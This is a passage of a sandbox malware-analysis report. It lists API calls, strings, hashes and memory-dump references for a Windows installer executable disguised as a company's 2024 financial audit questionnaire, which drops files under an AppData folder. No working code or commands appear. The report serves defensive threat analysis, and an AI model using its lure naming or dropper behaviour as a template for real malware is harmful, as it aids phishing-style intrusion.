                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 1638840714-813528018
                                                                                                    • Opcode ID: f7ebdd8b268411a9b37aa70f9024469a2a71c778bc2b79fb1238a5057d52bc19
                                                                                                    • Instruction ID: 03f87516f98afcaf774383f7594fe685c09e1d2031758133a9bfc9c340c12758
                                                                                                    • Opcode Fuzzy Hash: f7ebdd8b268411a9b37aa70f9024469a2a71c778bc2b79fb1238a5057d52bc19
                                                                                                    • Instruction Fuzzy Hash: 2E026DB0A00209EFEB209F54DD85AAE7BB5FB44354F10857AF610BA2E1C7789D52CF58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                    • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                      • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406283
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406297
                                                                                                      • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004062AA
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                                                      • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                      • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                                                      • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: A$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$&B
                                                                                                    • API String ID: 2624150263-2165081339
                                                                                                    • Opcode ID: 114b84ffbc372fa177182272010cbbd35a60563a0620183ccf333a24de688714
                                                                                                    • Instruction ID: 99b17f69f627c4fe70adaab035ba94d9a502da106e2b73a6a76b2d9e8e29038f
                                                                                                    • Opcode Fuzzy Hash: 114b84ffbc372fa177182272010cbbd35a60563a0620183ccf333a24de688714
                                                                                                    • Instruction Fuzzy Hash: ECA170B1A00209ABDB11AFA5DC85AAF77B8EF85714F10843BF601B62D1D77C89418F69
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145, xrefs: 004020FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance
                                                                                                    • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145
                                                                                                    • API String ID: 542301482-1892652693
                                                                                                    • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                                                    • Instruction ID: b1e6e5a65ced1a5d956167907e7332dfeee254deeda5808785c26b13febdce63
                                                                                                    • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                                                    • Instruction Fuzzy Hash: 2D415F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: de465c75c13fed098f87d81826f668e350bd36b98d1664987cc769742e30aac0
                                                                                                    • Instruction ID: 2767565cf4098148965081e12a0ae643aa49ff73535e0165105732fd86b2d8f1
                                                                                                    • Opcode Fuzzy Hash: de465c75c13fed098f87d81826f668e350bd36b98d1664987cc769742e30aac0
                                                                                                    • Instruction Fuzzy Hash: 4DF05EB56101149BCB00DBA4DD499AEB378FF04318F30497AE151F31D0D6B859409B3A
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                                                                    • GetSysColor.USER32(?), ref: 00404417
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                    • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                    • SetCursor.USER32(00000000), ref: 00404539
                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                    • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                    • String ID: Call$N$open
                                                                                                    • API String ID: 3615053054-2563687911
                                                                                                    • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                    • Instruction ID: ef3aff8114c15a744cba6b044a82d146c21238a9e490568bd42f4e53aa973cae
                                                                                                    • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                    • Instruction Fuzzy Hash: CF718FB1A00209FFDB109F60DD85A6A7BA9FB94344F00853AFB01B62D1C778AD51CF99
                                                                                                    APIs
                                                                                                    • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E4E,?,?,?,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                                                      • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                      • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                    • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                                                                    • wsprintfA.USER32 ref: 00405D22
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D5D
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D6C
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                                                      • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,80000000,00000003), ref: 00405BFC
                                                                                                      • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                    • API String ID: 1265525490-899692902
                                                                                                    • Opcode ID: a8d6815e5da54145bc517d01fd16b8e1ff93f39a7c8dcdb8ac9fdc12244dbea1
                                                                                                    • Instruction ID: 278018eb507e55e18bba05fe136388c5c8d345875c3a2ef582da275f9efe5ed0
                                                                                                    • Opcode Fuzzy Hash: a8d6815e5da54145bc517d01fd16b8e1ff93f39a7c8dcdb8ac9fdc12244dbea1
                                                                                                    • Instruction Fuzzy Hash: 4C410F71604B19BFD2206B61AC4DF6B3A6CDF45754F14053BB901F62C2EA38A9018ABD
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                    • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                                                    • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                    • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406283
                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406297
                                                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004062AA
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406221, 00406226
                                                                                                    • *?|<>/":, xrefs: 00406272
                                                                                                    • "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe", xrefs: 00406264
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 589700163-45335707
                                                                                                    • Opcode ID: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                    • Instruction ID: 01726bbc4e2c448ec391ae67e872290cbd2d47d18a3812a7b55dff680105d5d8
                                                                                                    • Opcode Fuzzy Hash: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                                                                    • Instruction Fuzzy Hash: F511AB1580061295DB313B549C44B77A2F8EF99790F5240BFED96B32C0E7BC5C9286BD
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                    • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                    • GetSysColor.USER32(?), ref: 00404265
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                    • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                    • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                    • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                    • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
